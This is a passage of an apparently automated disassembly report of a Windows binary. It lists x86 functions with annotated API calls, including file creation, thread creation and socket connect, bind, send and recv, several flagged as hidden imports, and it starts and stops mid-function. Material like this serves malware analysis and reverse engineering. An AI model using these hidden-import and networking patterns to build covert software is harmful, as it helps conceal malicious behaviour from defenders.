0040F58B xor eax, eax xrefs 0040F510
0040F58D pop edx
0040F58F pop ecx Count = 2
0040F590 mov dword ptr fs:[eax], edx
0040F593 push 0040F5A0h
0040F598 ret xrefs 0040F59E function end
Address Instruction Meta Information
004052E0 push ebx xrefs 00405343
004052E1 push esi
004052E2 add esp, FFFFFEF8h
004052E8 mov ebx, eax
004052EA cmp dword ptr [ebx+10h], 00000000h
004052EE jne 0040531Bh
004052F0 push 00000105h
004052F5 lea eax, dword ptr [esp+04h]
004052F9 push eax
004052FA mov eax, dword ptr [ebx+04h]
004052FD push eax
004052FE call 00401258h
00405303 mov eax, esp
00405305 mov dl, 01h
00405307 call 0040551Ch
0040530C mov esi, eax
0040530E mov dword ptr [ebx+10h], esi
00405311 test esi, esi
00405313 jne 0040531Bh
00405315 mov eax, dword ptr [ebx+04h]
00405318 mov dword ptr [ebx+10h], eax
0040531B mov eax, dword ptr [ebx+10h] xrefs 004052EE, 00405313
0040531E add esp, 00000108h
00405324 pop esi
00405325 pop ebx
00405326 ret function end
APIs
  • SetEndOfFile.KERNEL32, ref: 00412231
Address Instruction Meta Information
00412218 push ebp
00412219 mov ebp, esp
0041221B push ebx
0041221C mov ebx, eax
0041221E push dword ptr [ebp+0Ch]
00412221 push dword ptr [ebp+08h]
00412224 xor edx, edx
00412226 mov eax, ebx
00412228 mov ecx, dword ptr [eax]
0041222A call dword ptr [ecx+18h]
0041222D mov eax, dword ptr [ebx+04h]
00412230 push eax
00412231 call 00406274h SetEndOfFile@KERNEL32.DLL (Hidden Import)
00412236 call 0040BBDCh
0041223B pop ebx
0041223C pop ebp
0041223D retn 0008h function end
APIs
  • SHGetSpecialFolderPathA.SHELL32, ref: 00421CEF
Address Instruction Meta Information
00421CB8 push ebp xrefs 00421E40, 00422267, 00422017, 00429E73
00421CB9 mov ebp, esp
00421CBB push 00000000h
00421CBD push ebx
00421CBE push esi
00421CBF mov esi, edx
00421CC1 mov ebx, eax
00421CC3 xor eax, eax
00421CC5 push ebp
00421CC6 push 00421D27h
00421CCB push dword ptr fs:[eax]
00421CCE mov dword ptr fs:[eax], esp
00421CD1 lea eax, dword ptr [ebp-04h]
00421CD4 mov edx, 00000104h
00421CD9 call 004049A8h
00421CDE push 00000001h
00421CE0 movzx eax, bx
00421CE3 push eax
00421CE4 mov eax, dword ptr [ebp-04h]
00421CE7 call 00404878h
00421CEC push eax
00421CED push 00000000h
00421CEF call 00421B94h SHGetSpecialFolderPathA@SHELL32.DLL (Import)
00421CF4 test al, al
00421CF6 jne 00421D00h
00421CF8 lea eax, dword ptr [ebp-04h]
00421CFB call 004043DCh
00421D00 mov eax, dword ptr [ebp-04h] xrefs 00421CF6
00421D03 call 00404878h
00421D08 mov edx, eax
00421D0A mov eax, esi
00421D0C call 004045D4h
00421D11 xor eax, eax
00421D13 pop edx
00421D15 pop ecx Count = 2
00421D16 mov dword ptr fs:[eax], edx
00421D19 push 00421D2Eh
00421D1E lea eax, dword ptr [ebp-04h] xrefs 00421D2C
00421D21 call 004043DCh
00421D26 ret function end
APIs
  • ExitThread.KERNEL32, ref: 004043D5
Address Instruction Meta Information
004043D4 push eax xrefs 0041316C
004043D5 call 00401210h ExitThread@KERNEL32.DLL (Hidden Import)
004043DA ret function end
APIs
  • CreateFileA.KERNEL32, ref: 00407842
Address Instruction Meta Information
004077F4 push ebx xrefs 00412334
004077F5 push esi
004077F6 push edi
004077F7 mov ebx, edx
004077F9 mov edi, eax
004077FB or eax, FFFFFFFFh
004077FE mov esi, ebx
00407800 and esi, 03h
00407803 cmp esi, 02h
00407806 jnbe 00407847h
00407808 mov edx, ebx
0040780A and edx, 000000F0h
00407810 cmp edx, 40h
00407813 jnbe 00407847h
00407815 push 00000000h
00407817 push 00000080h
0040781C push 00000003h
0040781E push 00000000h
00407820 mov eax, ebx
00407822 and eax, 000000F0h
00407827 shr eax, 04h
0040782A mov eax, dword ptr [0042B16Ch+eax*4]
00407831 push eax
00407832 mov eax, dword ptr [0042B160h+esi*4]
00407839 push eax
0040783A mov eax, edi
0040783C call 00404878h
00407841 push eax
00407842 call 0040610Ch CreateFileA@KERNEL32.DLL (Hidden Import)
00407847 pop edi xrefs 00407806, 00407813
00407848 pop esi
00407849 pop ebx
0040784A ret function end
APIs
  • inet_addr.WS2_32, ref: 004144FB
  • gethostbyaddr.WS2_32, ref: 0041452E
  • getaddrinfo.WS2_32, ref: 004145AA
  • getnameinfo.WS2_32, ref: 004145FC
  • FreeAddrInfoW.WS2_32, ref: 0041462E
Address Instruction Meta Information
004144AC push ebp xrefs 004199EC
004144AD mov ebp, esp
004144AF add esp, FFFFFFCCh
004144B2 push ebx
004144B3 push esi
004144B4 push edi
004144B5 xor ebx, ebx
004144B7 mov dword ptr [ebp-0Ch], ebx
004144BA mov dword ptr [ebp-10h], ebx
004144BD mov edi, ecx
004144BF mov esi, edx
004144C1 mov dword ptr [ebp-04h], eax
004144C4 mov ebx, dword ptr [ebp+08h]
004144C7 mov eax, dword ptr [ebp-04h]
004144CA call 00404868h
004144CF xor eax, eax
004144D1 push ebp
004144D2 push 0041465Fh
004144D7 push dword ptr fs:[eax]
004144DA mov dword ptr fs:[eax], esp
004144DD mov eax, ebx
004144DF mov edx, dword ptr [ebp-04h]
004144E2 call 00404430h
004144E7 mov eax, esi
004144E9 call 00413B74h
004144EE test al, al
004144F0 jne 00414562h
004144F2 mov eax, dword ptr [ebp-04h]
004144F5 call 00404878h
004144FA push eax
004144FB call dword ptr [0042B420h] inet_addr@WS2_32.DLL (Hidden Import)
00414501 mov dword ptr [ebp-14h], eax
00414504 cmp dword ptr [ebp-14h], FFFFFFFFh
00414508 je 0041463Ch
0041450E mov eax, dword ptr [0042C8A4h] 00960A4C
00414513 call 00413914h
00414518 xor eax, eax
0041451A push ebp
0041451B push 0041455Bh
00414520 push dword ptr fs:[eax]
00414523 mov dword ptr fs:[eax], esp
00414526 push 00000002h
00414528 push 00000004h
0041452A lea eax, dword ptr [ebp-14h]
0041452D push eax
0041452E call dword ptr [0042B3E8h] gethostbyaddr@WS2_32.DLL (Hidden Import)
00414534 mov esi, eax
00414536 test esi, esi
00414538 je 00414543h
0041453A mov eax, ebx
0041453C mov edx, dword ptr [esi]
0041453E call 004045D4h
00414543 xor eax, eax xrefs 00414538
00414545 pop edx
00414547 pop ecx Count = 2
00414548 mov dword ptr fs:[eax], edx
0041454B push 0041463Ch
00414550 mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00414560
00414555 call 0041391Ch
0041455A ret function end
00414562 xor eax, eax xrefs 004144F0
00414564 mov dword ptr [ebp-08h], eax
00414567 xor edx, edx
00414569 push ebp
0041456A push 00414635h
0041456F push dword ptr fs:[edx]
00414572 mov dword ptr fs:[edx], esp
00414575 lea eax, dword ptr [ebp-34h]
00414578 xor ecx, ecx
0041457A mov edx, 00000020h
0041457F call 00403030h
00414584 xor eax, eax
00414586 mov dword ptr [ebp-30h], eax
00414589 mov eax, dword ptr [ebp+0Ch]
0041458C mov dword ptr [ebp-2Ch], eax
0041458F mov dword ptr [ebp-28h], edi
00414592 xor eax, eax
00414594 mov dword ptr [ebp-34h], eax
00414597 lea eax, dword ptr [ebp-08h]
0041459A push eax
0041459B lea eax, dword ptr [ebp-34h]
0041459E push eax
0041459F push 00000000h
004145A1 mov eax, dword ptr [ebp-04h]
004145A4 call 00404878h
004145A9 push eax
004145AA call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
004145B0 test eax, eax
004145B2 jne 00414617h
004145B4 cmp dword ptr [ebp-08h], 00000000h
004145B8 je 00414617h
004145BA mov esi, 00000401h
004145BF mov edi, 00000020h
004145C4 lea eax, dword ptr [ebp-0Ch]
004145C7 mov edx, esi
004145C9 call 004049A8h
004145CE lea eax, dword ptr [ebp-10h]
004145D1 mov edx, edi
004145D3 call 004049A8h
004145D8 push 00000008h
004145DA push edi
004145DB mov eax, dword ptr [ebp-10h]
004145DE call 00404878h
004145E3 push eax
004145E4 push esi
004145E5 mov eax, dword ptr [ebp-0Ch]
004145E8 call 00404878h
004145ED push eax
004145EE mov eax, dword ptr [ebp-08h]
004145F1 mov eax, dword ptr [eax+10h]
004145F4 push eax
004145F5 mov eax, dword ptr [ebp-08h]
004145F8 mov eax, dword ptr [eax+18h]
004145FB push eax
004145FC call dword ptr [0042B454h] getnameinfo@WS2_32.DLL (Hidden Import)
00414602 test eax, eax
00414604 jne 00414617h
00414606 mov eax, dword ptr [ebp-0Ch]
00414609 call 00404878h
0041460E mov edx, eax
00414610 mov eax, ebx
00414612 call 004045D4h
00414617 xor eax, eax xrefs 004145B2, 004145B8, 00414604
00414619 pop edx
0041461B pop ecx Count = 2
0041461C mov dword ptr fs:[eax], edx
0041461F push 0041463Ch
00414624 cmp dword ptr [ebp-08h], 00000000h xrefs 0041463A
00414628 je 00414634h
0041462A mov eax, dword ptr [ebp-08h]
0041462D push eax
0041462E call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00414634 ret xrefs 00414628 function end
0041463C xor eax, eax xrefs 00414508
0041463E pop edx
00414640 pop ecx Count = 2
00414641 mov dword ptr fs:[eax], edx
00414644 push 00414666h
00414649 lea eax, dword ptr [ebp-10h] xrefs 00414664
0041464C mov edx, 00000002h
00414651 call 00404400h
00414656 lea eax, dword ptr [ebp-04h]
00414659 call 004043DCh
0041465E ret function end
APIs
  • CloseHandle.KERNEL32, ref: 00412EE8
Address Instruction Meta Information
00412ED8 push 0042C860h xrefs 004136B1
00412EDD call 00406114h
00412EE2 mov eax, dword ptr [0042C848h] 00000048
00412EE7 push eax
00412EE8 call 004060ECh CloseHandle@KERNEL32.DLL (Hidden Import)
00412EED ret function end
APIs
  • GetCommandLineA.KERNEL32, ref: 004029F2
Address Instruction Meta Information
004029BC push ebx xrefs 00429EAD
004029BD push esi
004029BE push edi
004029BF add esp, FFFFFEF8h
004029C5 mov ebx, edx
004029C7 mov esi, eax
004029C9 mov eax, ebx
004029CB call 004043DCh
004029D0 test esi, esi
004029D2 jne 004029F2h
004029D4 push 00000105h
004029D9 lea eax, dword ptr [esp+04h]
004029DD push eax
004029DE push 00000000h
004029E0 call 00401258h
004029E5 mov ecx, eax
004029E7 mov edx, esp
004029E9 mov eax, ebx
004029EB call 004044CCh
004029F0 jmp 00402A10h
004029F2 call 00401240h GetCommandLineA@KERNEL32.DLL (Hidden Import) xrefs 004029D2
004029F7 mov edi, eax
004029F9 mov edx, ebx xrefs 00402A0E
004029FB mov eax, edi
004029FD call 004028D0h
00402A02 mov edi, eax
00402A04 test esi, esi
00402A06 je 00402A10h
00402A08 cmp dword ptr [ebx], 00000000h
00402A0B je 00402A10h
00402A0D dec esi
00402A0E jmp 004029F9h
00402A10 add esp, 00000108h xrefs 00402A06, 00402A0B, 004029F0
00402A16 pop edi
00402A17 pop esi
00402A18 pop ebx
00402A19 ret function end
APIs
  • CompareStringA.KERNEL32, ref: 004073D9
Address Instruction Meta Information
004073AC push ebx xrefs 004073EE, 0040990F, 00409D7F, 00409DA9, 004118BC, 00411F24
004073AD push esi
004073AE mov esi, edx
004073B0 mov ebx, eax
004073B2 mov eax, esi
004073B4 call 00404678h
004073B9 push eax
004073BA mov eax, esi
004073BC call 00404878h
004073C1 push eax
004073C2 mov eax, ebx
004073C4 call 00404678h
004073C9 push eax
004073CA mov eax, ebx
004073CC call 00404878h
004073D1 push eax
004073D2 push 00000001h
004073D4 push 00000400h
004073D9 call 004060F4h CompareStringA@KERNEL32.DLL (Hidden Import)
004073DE sub eax, 02h
004073E1 pop esi
004073E2 pop ebx
004073E3 ret function end
APIs
  • Sleep.KERNEL32, ref: 00413779
Address Instruction Meta Information
00413778 push eax xrefs 00418672, 00418696, 004196E8, 00418D63
00413779 call 0040628Ch Sleep@KERNEL32.DLL (Hidden Import)
0041377E ret function end
APIs
  • connect.WS2_32, ref: 00413A04
Address Instruction Meta Information
004139F4 push ebx xrefs 00418520
004139F5 push esi
004139F6 mov ebx, edx
004139F8 mov esi, eax
004139FA mov eax, ebx
004139FC call 0041399Ch
00413A01 push eax
00413A02 push ebx
00413A03 push esi
00413A04 call dword ptr [0042B434h] connect@WS2_32.DLL (Hidden Import)
00413A0A pop esi
00413A0B pop ebx
00413A0C ret function end
Address Instruction Meta Information
0041C7E8 push ebp
0041C7E9 mov ebp, esp
0041C7EB xor eax, eax
0041C7ED push ebp
0041C7EE push 0041C81Dh
0041C7F3 push dword ptr fs:[eax]
0041C7F6 mov dword ptr fs:[eax], esp
0041C7F9 inc dword ptr [0042C8F0h]
0041C7FF jne 0041C80Fh
0041C801 mov eax, dword ptr [0042B858h] 0042B3CC
0041C806 mov eax, dword ptr [eax]
0041C808 call eax
0041C80A call 00414C90h
0041C80F xor eax, eax xrefs 0041C7FF
0041C811 pop edx
0041C813 pop ecx Count = 2
0041C814 mov dword ptr fs:[eax], edx
0041C817 push 0041C824h
0041C81C ret function end
APIs
  • RtlEnterCriticalSection.NTDLL, ref: 0040F3FE
  • RtlLeaveCriticalSection.NTDLL, ref: 0040F46A
Address Instruction Meta Information
0040F3C8 push ebp xrefs 0040EFE7, 0040DAE6, 0040DE08, 0040E0F9, 0040E7F0, 0040F1F3, 0040F1AB
0040F3C9 mov ebp, esp
0040F3CB push ecx
0040F3CC push ebx
0040F3CD push esi
0040F3CE push edi
0040F3CF mov esi, edx
0040F3D1 mov ebx, eax
0040F3D3 cmp dword ptr [0042C81Ch], 00000000h
0040F3DA je 0040F3EAh
0040F3DC cmp bx, 0100h
0040F3E1 jc 0040F3EAh
0040F3E3 cmp bx, 07FFh
0040F3E8 jbe 0040F3EEh
0040F3EA xor eax, eax xrefs 0040F3DA, 0040F3E1
0040F3EC jmp 0040F3F0h
0040F3EE mov al, 01h xrefs 0040F3E8
0040F3F0 mov byte ptr [ebp-01h], al xrefs 0040F3EC
0040F3F3 cmp byte ptr [ebp-01h], 00000000h
0040F3F7 je 0040F477h
0040F3F9 push 0042C820h
0040F3FE call 0040611Ch RtlEnterCriticalSection@NTDLL.DLL (Hidden Import)
0040F403 xor eax, eax
0040F405 push ebp
0040F406 push 0040F470h
0040F40B push dword ptr fs:[eax]
0040F40E mov dword ptr fs:[eax], esp
0040F411 mov eax, dword ptr [0042C81Ch] 00000000
0040F416 call 0040508Ch
0040F41B movzx edi, bx
0040F41E mov edx, edi
0040F420 sub edx, 00000100h
0040F426 cmp eax, edx
0040F428 setnle byte ptr [ebp-01h]
0040F42C cmp byte ptr [ebp-01h], 00000000h
0040F430 je 0040F458h
0040F432 mov eax, dword ptr [0042C81Ch] 00000000
0040F437 mov eax, dword ptr [eax+edi*4-00000400h]
0040F43E mov dword ptr [esi], eax
0040F440 cmp dword ptr [esi], 00000000h
0040F443 je 0040F44Fh
0040F445 mov eax, dword ptr [esi]
0040F447 cmp eax, dword ptr [0042B344h] FFFFFFFF
0040F44D jne 0040F453h
0040F44F xor eax, eax xrefs 0040F443
0040F451 jmp 0040F455h
0040F453 mov al, 01h xrefs 0040F44D
0040F455 mov byte ptr [ebp-01h], al xrefs 0040F451
0040F458 xor eax, eax xrefs 0040F430
0040F45A pop edx
0040F45C pop ecx Count = 2
0040F45D mov dword ptr fs:[eax], edx
0040F460 push 0040F477h
0040F465 push 0042C820h xrefs 0040F475
0040F46A call 0040623Ch RtlLeaveCriticalSection@NTDLL.DLL (Hidden Import)
0040F46F ret function end
0040F477 mov al, byte ptr [ebp-01h] xrefs 0040F3F7
0040F47A pop edi
0040F47B pop esi
0040F47C pop ebx
0040F47D pop ecx
0040F47E pop ebp
0040F47F ret function end
Address Instruction Meta Information
00407978 push ebx xrefs 00422000, 00429E90
00407979 mov ebx, eax
0040797B mov eax, ebx
0040797D call 00407910h
00407982 inc eax
00407983 setne al
00407986 pop ebx
00407987 ret function end
APIs
  • GetDiskFreeSpaceA.KERNEL32, ref: 00407A6D
Address Instruction Meta Information
00407A4C push ebp
00407A4D mov ebp, esp
00407A4F add esp, FFFFFFE8h
00407A52 push ebx
00407A53 mov eax, dword ptr [ebp+08h]
00407A56 test eax, eax
00407A58 jne 00407A5Ch
00407A5A xor eax, eax
00407A5C lea edx, dword ptr [ebp-10h] xrefs 00407A58
00407A5F push edx
00407A60 lea edx, dword ptr [ebp-0Ch]
00407A63 push edx
00407A64 lea edx, dword ptr [ebp-08h]
00407A67 push edx
00407A68 lea edx, dword ptr [ebp-04h]
00407A6B push edx
00407A6C push eax
00407A6D call 00406194h GetDiskFreeSpaceA@KERNEL32.DLL (Hidden Import)
00407A72 mov ebx, eax
00407A74 mov eax, dword ptr [ebp-04h]
00407A77 imul dword ptr [ebp-08h]
00407A7A xor edx, edx
00407A7C mov dword ptr [ebp-18h], eax
00407A7F mov dword ptr [ebp-14h], edx
00407A82 mov eax, dword ptr [ebp-0Ch]
00407A85 xor edx, edx
00407A87 push edx
00407A88 push eax
00407A89 mov eax, dword ptr [ebp-18h]
00407A8C mov edx, dword ptr [ebp-14h]
00407A8F call 00405068h
00407A94 mov ecx, dword ptr [ebp+0Ch]
00407A97 mov dword ptr [ecx], eax
00407A99 mov dword ptr [ecx+04h], edx
00407A9C mov eax, dword ptr [ebp-10h]
00407A9F xor edx, edx
00407AA1 push edx
00407AA2 push eax
00407AA3 mov eax, dword ptr [ebp-18h]
00407AA6 mov edx, dword ptr [ebp-14h]
00407AA9 call 00405068h
00407AAE mov ecx, dword ptr [ebp+10h]
00407AB1 mov dword ptr [ecx], eax
00407AB3 mov dword ptr [ecx+04h], edx
00407AB6 mov eax, ebx
00407AB8 pop ebx
00407AB9 mov esp, ebp
00407ABB pop ebp
00407ABC retn 0010h function end
APIs
  • send.WS2_32, ref: 00413AE3
Address Instruction Meta Information
00413AD8 push ebp xrefs 004187BD, 004187FA
00413AD9 mov ebp, esp
00413ADB push ebx
00413ADC mov ebx, dword ptr [ebp+08h]
00413ADF push ebx
00413AE0 push ecx
00413AE1 push edx
00413AE2 push eax
00413AE3 call dword ptr [0042B400h] send@WS2_32.DLL (Hidden Import)
00413AE9 pop ebx
00413AEA pop ebp
00413AEB retn 0004h function end
APIs
  • RtlDeleteCriticalSection.NTDLL, ref: 0040F4A3
Address Instruction Meta Information
0040F480 push ebp
0040F481 mov ebp, esp
0040F483 xor eax, eax
0040F485 push ebp
0040F486 push 0040F4EFh
0040F48B push dword ptr fs:[eax]
0040F48E mov dword ptr fs:[eax], esp
0040F491 inc dword ptr [0042C818h]
0040F497 jne 0040F4E1h
0040F499 call 0040F124h
0040F49E push 0042C820h
0040F4A3 call 00406114h RtlDeleteCriticalSection@NTDLL.DLL (Hidden Import)
0040F4A8 mov eax, 0042C81Ch
0040F4AD mov edx, dword ptr [0040F100h] 0040F104
0040F4B3 call 00405254h
0040F4B8 mov eax, 0042B348h
0040F4BD mov ecx, 00000015h
0040F4C2 mov edx, dword ptr [00401040h] 00401044
0040F4C8 call 00404D40h
0040F4CD mov eax, 0042B33Ch
0040F4D2 call 004043DCh
0040F4D7 mov eax, 0042C7F8h
0040F4DC call 0040DB20h
0040F4E1 xor eax, eax xrefs 0040F497
0040F4E3 pop edx
0040F4E5 pop ecx Count = 2
0040F4E6 mov dword ptr fs:[eax], edx
0040F4E9 push 0040F4F6h
0040F4EE ret xrefs 0040F4F4 function end
Strings
  • p B, va: 00420924
Address Instruction Meta Information
00421A91 sub eax, 0042CA94h
00421A96 add dword ptr [ebx+16h], esi
00421A99 call 0041F43Ch
00421A9E test al, al
00421AA0 je 00421AAFh
00421AA2 mov eax, dword ptr [0042B97Ch] 0042B5D8
00421AA7 mov edx, dword ptr [00420924h] ASCII "p B"
00421AAD mov dword ptr [eax], edx
00421AAF ret xrefs 00421AA0 function end
APIs
  • CreateThread.KERNEL32, ref: 004043C6
Address Instruction Meta Information
00404390 push ebp xrefs 004131D6
00404391 mov ebp, esp
00404393 push ebx
00404394 push esi
00404395 push edi
00404396 mov edi, ecx
00404398 mov esi, edx
0040439A mov ebx, eax
0040439C mov eax, 00000008h
004043A1 call 004026C8h
004043A6 mov dword ptr [eax], edi
004043A8 mov edx, dword ptr [ebp+10h]
004043AB mov dword ptr [eax+04h], edx
004043AE mov byte ptr [0042C045h], 00000001h
004043B5 mov edx, dword ptr [ebp+08h]
004043B8 push edx
004043B9 mov edx, dword ptr [ebp+0Ch]
004043BC push edx
004043BD push eax
004043BE mov eax, 00404358h
004043C3 push eax
004043C4 push esi
004043C5 push ebx
004043C6 call 00401208h CreateThread@KERNEL32.DLL (Hidden Import)
004043CB pop edi
004043CC pop esi
004043CD pop ebx
004043CE pop ebp
004043CF retn 000Ch function end
APIs
  • RtlGetLastWin32Error.NTDLL, ref: 00402DD9
Address Instruction Meta Information
00402DA8 push ebp xrefs 00402E48, 00402E68
00402DA9 mov ebp, esp
00402DAB push ecx
00402DAC push ebx
00402DAD push esi
00402DAE push edi
00402DAF mov esi, ecx
00402DB1 mov edi, edx
00402DB3 mov ebx, eax
00402DB5 mov eax, dword ptr [ebp+10h]
00402DB8 movzx edx, word ptr [ebx+04h]
00402DBC and edx, eax
00402DBE cmp eax, edx
00402DC0 jne 00402E1Ah
00402DC2 push 00000000h
00402DC4 lea eax, dword ptr [ebp-04h]
00402DC7 push eax
00402DC8 mov eax, dword ptr [ebx+08h]
00402DCB imul esi
00402DCD push eax
00402DCE push edi
00402DCF mov eax, dword ptr [ebx]
00402DD1 push eax
00402DD2 call dword ptr [ebp+0Ch]
00402DD5 test eax, eax
00402DD7 jne 00402DEAh
00402DD9 call 00401248h RtlGetLastWin32Error@NTDLL.DLL (Hidden Import)
00402DDE call 00402810h
00402DE3 xor eax, eax
00402DE5 mov dword ptr [ebp-04h], eax
00402DE8 jmp 00402E29h
00402DEA mov eax, dword ptr [ebp-04h] xrefs 00402DD7
00402DED xor edx, edx
00402DEF div dword ptr [ebx+08h]
00402DF2 mov dword ptr [ebp-04h], eax
00402DF5 mov eax, dword ptr [ebp+14h]
00402DF8 test eax, eax
00402DFA je 00402E06h
00402DFC mov eax, dword ptr [ebp+14h]
00402DFF mov edx, dword ptr [ebp-04h]
00402E02 mov dword ptr [eax], edx
00402E04 jmp 00402E29h
00402E06 cmp esi, dword ptr [ebp-04h] xrefs 00402DFA
00402E09 je 00402E29h
00402E0B mov eax, dword ptr [ebp+08h]
00402E0E call 00402810h
00402E13 xor eax, eax
00402E15 mov dword ptr [ebp-04h], eax
00402E18 jmp 00402E29h
00402E1A mov eax, 00000067h xrefs 00402DC0
00402E1F call 00402810h
00402E24 xor eax, eax
00402E26 mov dword ptr [ebp-04h], eax
00402E29 mov eax, dword ptr [ebp-04h] xrefs 00402E09, 00402E18, 00402E04, 00402DE8
00402E2C pop edi
00402E2D pop esi
00402E2E pop ebx
00402E2F pop ecx
00402E30 pop ebp
00402E31 retn 0010h function end
APIs
  • bind.WS2_32, ref: 004139E8
Address Instruction Meta Information
004139D8 push ebx xrefs 0041840F
004139D9 push esi
004139DA mov ebx, edx
004139DC mov esi, eax
004139DE mov eax, ebx
004139E0 call 0041399Ch
004139E5 push eax
004139E6 push ebx
004139E7 push esi
004139E8 call dword ptr [0042B43Ch] bind@WS2_32.DLL (Hidden Import)
004139EE pop esi
004139EF pop ebx
004139F0 ret function end
APIs
  • WideCharToMultiByte.KERNEL32, ref: 00404512
Address Instruction Meta Information
004044FC push ebp xrefs 004045A3, 00404573
004044FD mov ebp, esp
00404501 push 00000000h Count = 2
00404503 push edx
00404504 push eax
00404505 mov eax, dword ptr [ebp+08h]
00404508 push eax
00404509 push ecx
0040450A push 00000000h
0040450C mov eax, dword ptr [0042C5B8h] 00000003
00404511 push eax
00404512 call 004012C0h WideCharToMultiByte@KERNEL32.DLL (Hidden Import)
00404517 pop ebp
00404518 retn 0004h function end
APIs
  • recv.WS2_32, ref: 00413AFB
Address Instruction Meta Information
00413AF0 push ebp xrefs 00418B17, 004193F4
00413AF1 mov ebp, esp
00413AF3 push ebx
00413AF4 mov ebx, dword ptr [ebp+08h]
00413AF7 push ebx
00413AF8 push ecx
00413AF9 push edx
00413AFA push eax
00413AFB call dword ptr [0042B404h] recv@WS2_32.DLL (Hidden Import)
00413B01 pop ebx
00413B02 pop ebp
00413B03 retn 0004h function end
APIs
  • InterlockedExchange.KERNEL32, ref: 00412FB7
  • PeekMessageA.USER32, ref: 00413556
  • MsgWaitForMultipleObjects.USER32, ref: 0041356B
  • GetExitCodeThread.KERNEL32, ref: 004135A3
Address Instruction Meta Information
0041351C push ebx xrefs 0042254E, 00413281
0041351D push esi
0041351E add esp, FFFFFFD8h
00413521 mov esi, eax
00413523 mov eax, dword ptr [esi+04h]
00413526 mov dword ptr [esp+04h], eax
0041352A call 00406184h
0041352F mov edx, dword ptr [0042B984h] 0042C030
00413535 cmp eax, dword ptr [edx]
00413537 jne 00413591h
00413539 xor ebx, ebx
0041353B mov eax, dword ptr [0042C848h] 00000048
00413540 mov dword ptr [esp+08h], eax
00413544 cmp ebx, 02h xrefs 0041358D
00413547 jne 0041355Bh
0041354F push 00000000h Count = 4
00413551 lea eax, dword ptr [esp+1Ch]
00413555 push eax
00413556 call 004062DCh PeekMessageA@USER32.DLL (Hidden Import)
0041355B push 00000040h xrefs 00413547
0041355D push 000003E8h
00413562 push 00000000h
00413564 lea eax, dword ptr [esp+10h]
00413568 push eax
00413569 push 00000002h
0041356B call 004062D4h MsgWaitForMultipleObjects@USER32.DLL (Hidden Import)
00413570 mov ebx, eax
00413572 cmp ebx, FFFFFFFFh
00413575 setne dl
00413578 mov eax, esi
0041357A call 00413344h
0041357F cmp ebx, 01h
00413582 jne 0041358Bh
00413584 xor eax, eax
00413586 call 00412F3Ch
0041358B test ebx, ebx xrefs 00413582
0041358D jne 00413544h
0041358F jmp 0041359Dh
00413591 push FFFFFFFFh xrefs 00413537
00413593 mov eax, dword ptr [esp+08h]
00413597 push eax
00413598 call 0040629Ch
0041359D push esp xrefs 0041358F
0041359E mov eax, dword ptr [esp+08h]
004135A2 push eax
004135A3 call 0040619Ch GetExitCodeThread@KERNEL32.DLL (Hidden Import)
004135A8 cmp eax, 01h
004135AB sbb edx, edx
004135AD inc edx
004135AE mov eax, esi
004135B0 call 00413344h
004135B5 mov eax, dword ptr [esp]
004135B8 add esp, 28h
004135BB pop esi
004135BC pop ebx
004135BD ret function end
APIs
  • SetFilePointer.KERNEL32, ref: 00402FB1
Address Instruction Meta Information
00402F94 push ebx xrefs 00402F7E
00402F95 push esi
00402F96 mov ebx, eax
00402F98 mov ax, word ptr [ebx+04h]
00402F9C cmp ax, 0000D7B0h
00402FA0 jbe 00402FCFh
00402FA2 cmp ax, 0000D7B3h
00402FA6 jnbe 00402FCFh
00402FA8 push 00000001h
00402FAC push 00000000h Count = 2
00402FAE mov eax, dword ptr [ebx]
00402FB0 push eax
00402FB1 call 004011E8h SetFilePointer@KERNEL32.DLL (Hidden Import)
00402FB6 mov esi, eax
00402FB8 cmp esi, FFFFFFFFh
00402FBB jne 00402FC4h
00402FBD call 00402820h
00402FC2 jmp 00402FDCh
00402FC4 mov eax, esi xrefs 00402FBB
00402FC6 xor edx, edx
00402FC8 div dword ptr [ebx+08h]
00402FCB mov esi, eax
00402FCD jmp 00402FDCh
00402FCF mov eax, 00000067h xrefs 00402FA0, 00402FA6
00402FD4 call 00402810h
00402FD9 or esi, FFFFFFFFh
00402FDC mov eax, esi xrefs 00402FCD, 00402FC2
00402FDE pop esi
00402FDF pop ebx
00402FE0 ret function end
APIs
  • VirtualQuery.KERNEL32, ref: 004052C3
Address Instruction Meta Information
004052B8 add esp, FFFFFFE4h xrefs 00410318
004052BB push 0000001Ch
004052BD lea edx, dword ptr [esp+04h]
004052C1 push edx
004052C2 push eax
004052C3 call 004012C8h VirtualQuery@KERNEL32.DLL (Hidden Import)
004052C8 cmp dword ptr [esp+10h], 00001000h
004052D0 jne 004052D8h
004052D2 mov eax, dword ptr [esp+04h]
004052D6 jmp 004052DAh
004052D8 xor eax, eax xrefs 004052D0
004052DA add esp, 1Ch xrefs 004052D6
004052DD ret function end
APIs
  • SetEvent.KERNEL32, ref: 00412F1E
  • CreateEventA.KERNEL32, ref: 004133B3
Address Instruction Meta Information
00413384 push ebp xrefs 004134E0
00413385 mov ebp, esp
00413387 add esp, FFFFFFF4h
0041338A push ebx
0041338B mov dword ptr [ebp-04h], edx
0041338E call 00406184h
00413393 mov edx, dword ptr [0042B984h] 0042C030
00413399 cmp eax, dword ptr [edx]
0041339B jne 004133ABh
0041339D mov ebx, dword ptr [ebp-04h]
004133A0 mov eax, dword ptr [ebx+0Ch]
004133A3 call dword ptr [ebx+08h]
004133A6 jmp 004134BEh
004133AD push 00000000h Count = 2
004133AF push FFFFFFFFh
004133B1 push 00000000h
004133B3 call 00406104h CreateEventA@KERNEL32.DLL (Hidden Import)
004133B8 mov dword ptr [ebp-08h], eax
004133BB xor eax, eax
004133BD push ebp
004133BE push 004134A6h
004133C3 push dword ptr fs:[eax]
004133C6 mov dword ptr fs:[eax], esp
004133C9 push 0042C860h
004133CE call 0040611Ch
004133D3 xor eax, eax
004133D5 push ebp
004133D6 push 00413488h
004133DB push dword ptr fs:[eax]
004133DE mov dword ptr fs:[eax], esp
004133E1 cmp dword ptr [0042B3C4h], 00000000h
004133E8 jne 004133FBh
004133EA mov dl, 01h
004133EC mov eax, dword ptr [0040FA48h] 0040FA94
004133F1 call 004036D8h
004133F6 mov dword ptr [0042B3C4h], eax
004133FB mov eax, dword ptr [ebp-04h] xrefs 004133E8
004133FE mov dword ptr [ebp-0Ch], eax
00413401 lea edx, dword ptr [ebp-0Ch]
00413404 mov eax, dword ptr [0042B3C4h] 00000000
00413409 call 00410574h
0041340E call 00412F18h
00413413 cmp word ptr [0042B3BEh], 0000h
